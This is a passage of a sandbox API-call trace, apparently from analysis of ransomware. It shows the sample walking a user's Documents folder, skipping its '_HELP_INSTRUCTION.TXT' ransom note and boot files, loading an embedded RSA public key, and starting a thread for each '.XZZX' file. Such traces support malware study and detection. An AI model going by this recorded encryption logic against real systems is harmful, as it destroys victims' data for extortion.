lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa34 [0172.698] Sleep (dwMilliseconds=0x96) [0172.853] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0172.853] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2="..") returned 1 [0172.853] lstrcmpW (lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpString2=".") returned 1 [0172.853] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0172.854] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntldr") returned 0x0 [0172.854] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTLDR") returned 0x0 [0172.854] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0172.854] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="ntdetect.com") returned 0x0 [0172.854] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0172.854] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0172.854] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0172.854] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0172.854] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0172.854] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa38 [0172.854] Sleep (dwMilliseconds=0x96) [0173.009] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.009] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2="..") returned 1 [0173.009] lstrcmpW (lpString1="5F3F59042CD153CCC290441930FE3814.XZZX", lpString2=".") returned 1 [0173.009] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.009] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntldr") returned 0x0 [0173.009] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTLDR") returned 0x0 [0173.009] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.009] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.009] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.009] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.010] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.010] lstrcpyW (in: lpString1=0x17cf1c, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0173.010] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.010] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa3c [0173.010] Sleep (dwMilliseconds=0x96) [0173.165] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.165] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2="..") returned 1 [0173.165] lstrcmpW (lpString1="7E0556C23257A27A640F901F368486C2.XZZX", lpString2=".") returned 1 [0173.165] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.165] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntldr") returned 0x0 [0173.165] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTLDR") returned 0x0 [0173.165] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.165] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.165] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.165] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.166] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.166] lstrcpyW (in: lpString1=0x17cf1c, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0173.166] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa40 [0173.166] Sleep (dwMilliseconds=0x96) [0173.321] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.321] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2="..") returned 1 [0173.321] lstrcmpW (lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpString2=".") returned 1 [0173.321] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.321] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntldr") returned 0x0 [0173.321] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTLDR") returned 0x0 [0173.321] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.321] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.321] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.322] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.322] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.322] lstrcpyW (in: lpString1=0x17cf1c, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0173.322] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.322] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa44 [0173.322] Sleep (dwMilliseconds=0x96) [0173.477] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.477] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2="..") returned 1 [0173.477] lstrcmpW (lpString1="A9467A821967F20598E66B961D60D64D.XZZX", lpString2=".") returned 1 [0173.477] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.477] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntldr") returned 0x0 [0173.477] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTLDR") returned 0x0 [0173.477] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.478] StrStrW (lpFirst="A9467A821967F20598E66B961D60D64D.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.478] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.478] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.478] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.478] lstrcpyW (in: lpString1=0x17cf1c, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0173.478] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.478] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa48 [0173.478] Sleep (dwMilliseconds=0x96) [0173.633] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.633] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2="..") returned 1 [0173.633] lstrcmpW (lpString1="AF137D37318F929FC9EC733B358876E7.XZZX", lpString2=".") returned 1 [0173.633] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.633] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntldr") returned 0x0 [0173.633] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTLDR") returned 0x0 [0173.633] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.633] StrStrW (lpFirst="AF137D37318F929FC9EC733B358876E7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.633] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.633] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.634] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.634] lstrcpyW (in: lpString1=0x17cf1c, lpString2="AF137D37318F929FC9EC733B358876E7.XZZX" | out: lpString1="AF137D37318F929FC9EC733B358876E7.XZZX") returned="AF137D37318F929FC9EC733B358876E7.XZZX" [0173.634] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.634] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa4c [0173.634] Sleep (dwMilliseconds=0x96) [0173.789] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.789] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2="..") returned 1 [0173.789] lstrcmpW (lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpString2=".") returned 1 [0173.789] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.789] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntldr") returned 0x0 [0173.789] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTLDR") returned 0x0 [0173.789] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.790] StrStrW (lpFirst="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.790] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.790] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.790] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.790] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" | out: lpString1="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX") returned="B0407B59334CDCAF9E2CA2E33779C0F7.XZZX" [0173.790] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0173.790] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xa50 [0173.790] Sleep (dwMilliseconds=0x96) [0173.945] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0173.945] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2="..") returned 1 [0173.945] lstrcmpW (lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpString2=".") returned 1 [0173.945] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0173.945] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntldr") returned 0x0 [0173.945] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTLDR") returned 0x0 [0173.946] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0173.946] StrStrW (lpFirst="B34C34B41EC5682F9CB9477C22BE4C77.XZZX", lpSrch="ntdetect.com") returned 0x0 [0173.946] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 44 [0173.946] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") [0173.946] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0173.946] lstrcpyW (in: lpString1=0x17cf1c, lpString2="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" | out: lpString1="B34C34B41EC5682F9CB9477C22BE4C77.XZZX") returned="B34C34B41EC5682F9CB9477C22BE4C77.XZZX" [0173.946] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" 